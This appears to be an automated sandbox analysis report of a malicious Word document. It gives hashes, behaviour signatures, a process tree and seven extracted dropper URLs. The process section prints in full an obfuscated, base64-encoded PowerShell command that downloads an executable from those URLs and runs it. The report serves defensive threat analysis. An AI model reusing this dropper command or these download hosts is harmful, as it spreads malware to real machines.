Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    21/08/2024, 01:36

General

  • Target

    b1a74aca86a21a5749a400fcdf10ab6c_JaffaCakes118.doc

  • Size

    176KB

  • MD5

    b1a74aca86a21a5749a400fcdf10ab6c

  • SHA1

    ff151c98ba0331c83f98c1bb2788255a4f0d803d

  • SHA256

    1ce10d907f4929d568a03b5336386ce51b7bb4cb3d4814bca951bdcbb11a0930

  • SHA512

    74a0b133f79f9db0766179d21e2886a500477ba89a25dad81c1c3dd50efba6147cbb7a54df5b34bd908128ab7aaafe5079cf834c89608196d07b4aad41f8a534

  • SSDEEP

    3072:UUqJ1NgsA8k/gvh0NZ0lGX1nZ7hZ7Q8eK8:UBtgVIveNZvnF88x8

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://babyshop.webdungsan.com/wp-admin/n/

exe.dropper

http://nguyenlieuphachehanoi.com/wp-admin/kL/

exe.dropper

http://notesever.com/cgi-bin/Cfs/

exe.dropper

http://superbetprediction.com/js/Qo/

exe.dropper

http://pattanitkpark.com/gipe2h/iqt/

exe.dropper

http://www.xxdaytoy.top/wp-content/E/

exe.dropper

http://huaibangchina.com/kic3kc/c/

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b1a74aca86a21a5749a400fcdf10ab6c_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:840
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABHAHQAZgB0AGEAYQBwAD0AKAAoACcATgB2AHUAJwArACcAZwBfAG0AJwApACsAJwBxACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAGUAcgBwAHIATwBmAEkATABFAFwAYgBtAHcARQBUAFcANABcAGEANgBBAGUAeQBCAFEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIARQBDAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAGAAVQBgAFIAaQBgAFQAWQBQAFIAbwBgAFQATwBjAE8ATAAiACAAPQAgACgAJwB0ACcAKwAoACcAbABzACcAKwAnADEAMgAnACkAKwAoACcALAAgACcAKwAnAHQAbAAnACkAKwAnAHMAJwArACcAMQAxACcAKwAoACcALAAgAHQAJwArACcAbABzACcAKQApADsAJABFAGkAMwAzADMAcgBmACAAPQAgACgAKAAnAEgAdABjACcAKwAnAGkAJwApACsAKAAnAGYAcgB3ACcAKwAnAHEAYgAnACkAKQA7ACQAQwA3ADAAaABnAGYAMwA9ACgAKAAnAE4AJwArACcAaQBsAHcAagAnACkAKwAnAGIAOAAnACkAOwAkAEIANgBjAGUAMgAwAG0APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAagBRACcAKwAoACcAbwBCAG0AdwBlAHQAdwA0ACcAKwAnAGoAUQBvACcAKwAnAEEANgBhAGUAJwApACsAJwB5ACcAKwAoACcAYgBxAGoAUQAnACsAJwBvACcAKQApACAAIAAtAHIARQBQAGwAQQBDAEUAIAAoAFsAYwBIAEEAcgBdADEAMAA2ACsAWwBjAEgAQQByAF0AOAAxACsAWwBjAEgAQQByAF0AMQAxADEAKQAsAFsAYwBIAEEAcgBdADkAMgApACsAJABFAGkAMwAzADMAcgBmACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABRADkAYgB4AHgAeQBwAD0AKAAnAFYAZQAnACsAKAAnAF8AJwArACcAaQBuADQAJwApACsAJwA5ACcAKQA7ACQASAA3AHkAaQBvAGMAZgA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgB3AEUAYgBjAGwASQBFAG4AdAA7ACQATAA1AHAAMgBvADMAZQA9ACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACgAJwBwACcAKwAnADoALwAvACcAKwAnAGIAYQAnACkAKwAoACcAYgB5AHMAaABvAHAAJwArACcALgAnACkAKwAnAHcAJwArACcAZQBiACcAKwAoACcAZAB1ACcAKwAnAG4AJwApACsAKAAnAGcAJwArACcAcwBhACcAKQArACgAJwBuAC4AYwAnACsAJwBvAG0ALwB3ACcAKQArACcAcAAnACsAJwAtACcAKwAoACcAYQBkAG0AJwArACcAaQAnACsAJwBuAC8AbgAvACoAJwApACsAKAAnAGgAdAAnACsAJwB0ACcAKQArACgAJwBwADoALwAvACcAKwAnAG4AZwB1ACcAKwAnAHkAZQAnACsAJwBuACcAKQArACcAbAAnACsAKAAnAGkAZQB1AHAAJwArACcAaAAnACkAKwAoACcAYQAnACsAJwBjAGgAZQBoAGEAbgBvACcAKwAnAGkAJwApACsAKAAnAC4AJwArACcAYwBvACcAKQArACcAbQAvACcAKwAnAHcAJwArACgAJwBwACcAKwAnAC0AJwArACcAYQBkAG0AaQBuAC8AawAnACsAJwBMAC8AJwApACsAJwAqACcAKwAoACcAaAB0AHQAcAA6AC8ALwBuACcAKwAnAG8AdABlACcAKwAnAHMAZQAnACkAKwAoACcAdgBlAHIALgBjACcAKwAnAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKQArACgAJwBnAGkALQAnACsAJwBiACcAKQArACcAaQAnACsAKAAnAG4AJwArACcALwBDACcAKQArACgAJwBmAHMAJwArACcALwAqAGgAJwApACsAKAAnAHQAJwArACcAdABwADoALwAvACcAKQArACcAcwAnACsAJwB1AHAAJwArACgAJwBlAHIAYgAnACsAJwBlAHQAJwApACsAKAAnAHAAcgBlACcAKwAnAGQAJwApACsAKAAnAGkAYwAnACsAJwB0AGkAJwApACsAKAAnAG8AbgAnACsAJwAuACcAKQArACcAYwAnACsAJwBvACcAKwAoACcAbQAvACcAKwAnAGoAcwAnACsAJwAvAFEAbwAvACoAaAB0AHQAJwArACcAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AcAAnACkAKwAoACcAYQB0ACcAKwAnAHQAJwApACsAKAAnAGEAJwArACcAbgBpAHQAJwApACsAKAAnAGsAJwArACcAcABhAHIAawAnACsAJwAuACcAKQArACcAYwBvACcAKwAoACcAbQAvACcAKwAnAGcAaQBwAGUAJwApACsAKAAnADIAaAAnACsAJwAvACcAKQArACgAJwBpACcAKwAnAHEAdAAnACkAKwAnAC8AKgAnACsAKAAnAGgAdAB0AHAAOgAvAC8AdwB3AHcAJwArACcALgB4ACcAKwAnAHgAJwApACsAKAAnAGQAYQAnACsAJwB5AHQAbwAnACkAKwAoACcAeQAuAHQAJwArACcAbwBwAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtAGMAbwAnACsAJwBuAHQAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAC8ARQAnACsAJwAvACcAKQArACcAKgAnACsAJwBoACcAKwAoACcAdAB0AHAAJwArACcAOgAvACcAKQArACgAJwAvACcAKwAnAGgAdQBhACcAKwAnAGkAYgAnACkAKwAnAGEAJwArACcAbgBnACcAKwAoACcAYwBoAGkAJwArACcAbgAnACkAKwAoACcAYQAuACcAKwAnAGMAJwApACsAJwBvACcAKwAoACcAbQAvAGsAJwArACcAaQBjACcAKQArACgAJwAzAGsAYwAvACcAKwAnAGMALwAnACkAKQAuACIAUwBQAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABOAHYAOAB0AHQAbABwAD0AKAAoACcASwAyACcAKwAnADYAaQAnACkAKwAoACcAdAB6ACcAKwAnAGsAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABJAHAANABmAHUAMwB3ACAAaQBuACAAJABMADUAcAAyAG8AMwBlACkAewB0AHIAeQB7ACQASAA3AHkAaQBvAGMAZgAuACIARABgAG8AYAB3AE4ATABvAGEARABmAGkAYABMAGUAIgAoACQASQBwADQAZgB1ADMAdwAsACAAJABCADYAYwBlADIAMABtACkAOwAkAEkAYQA2AHoAbwBvADQAPQAoACcATQAnACsAJwA1ACcAKwAoACcAbgBiACcAKwAnAGcAdQA4ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAEIANgBjAGUAMgAwAG0AKQAuACIAbABgAEUATgBgAEcAVABoACIAIAAtAGcAZQAgADMANAAzADAANwApACAAewAuACgAJwBJACcAKwAnAG4AJwArACcAdgBvAGsAZQAtACcAKwAnAEkAdABlAG0AJwApACgAJABCADYAYwBlADIAMABtACkAOwAkAFAAZAB5AGYAbgB3AG0APQAoACgAJwBRAGoAOAAnACsAJwA1AGgAdwAnACkAKwAnAGYAJwApADsAYgByAGUAYQBrADsAJABZADgAbQA5AGoAbQBlAD0AKAAnAE0AJwArACgAJwBiAHoAOQBuACcAKwAnAGoANgAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA4ADAAdwB3ADcAOQA9ACgAKAAnAE4AZwAnACsAJwAzACcAKQArACcAZgAnACsAKAAnADcAJwArACcAdwBrACcAKQApAA==
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3040

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      df76e3c5cb780d97df0893381a0836ea

      SHA1

      1a886b5e6fb35d6894abdaaae70a0021ef98bc35

      SHA256

      56713ca758d4b4b90acb6cb9f754a163b57c9f93bb8b8d74afeb15603dd8d303

      SHA512

      95889d0b85f49b5761ea166c452221a2d7f48ce1a6766737707a868c3b85780699637078739094f0d80926f9043959f28fe0d195392d5a1a0e3ab2e458514d95

    • memory/2184-29-0x00000000049F0000-0x0000000004AF0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-38-0x00000000049F0000-0x0000000004AF0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-5-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-6-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-7-0x0000000005DF0000-0x0000000005EF0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-9-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-8-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-10-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-12-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-42-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-41-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-40-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-47-0x00000000049F0000-0x0000000004AF0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-46-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-39-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-27-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-37-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-33-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-32-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-31-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-30-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-0-0x000000002FC41000-0x000000002FC42000-memory.dmp

      Filesize

      4KB

    • memory/2184-2-0x000000007121D000-0x0000000071228000-memory.dmp

      Filesize

      44KB

    • memory/2184-28-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-62-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-19-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-18-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-17-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-16-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-15-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-48-0x00000000049F0000-0x0000000004AF0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-14-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-13-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-11-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-83-0x000000007121D000-0x0000000071228000-memory.dmp

      Filesize

      44KB

    • memory/2184-82-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2184-56-0x000000007121D000-0x0000000071228000-memory.dmp

      Filesize

      44KB

    • memory/2184-61-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-20-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-63-0x00000000049F0000-0x0000000004AF0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-64-0x00000000005F0000-0x00000000006F0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-66-0x00000000049F0000-0x0000000004AF0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-65-0x00000000049F0000-0x0000000004AF0000-memory.dmp

      Filesize

      1024KB

    • memory/2184-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/3040-54-0x000000001B7E0000-0x000000001BAC2000-memory.dmp

      Filesize

      2.9MB

    • memory/3040-55-0x00000000026F0000-0x00000000026F8000-memory.dmp

      Filesize

      32KB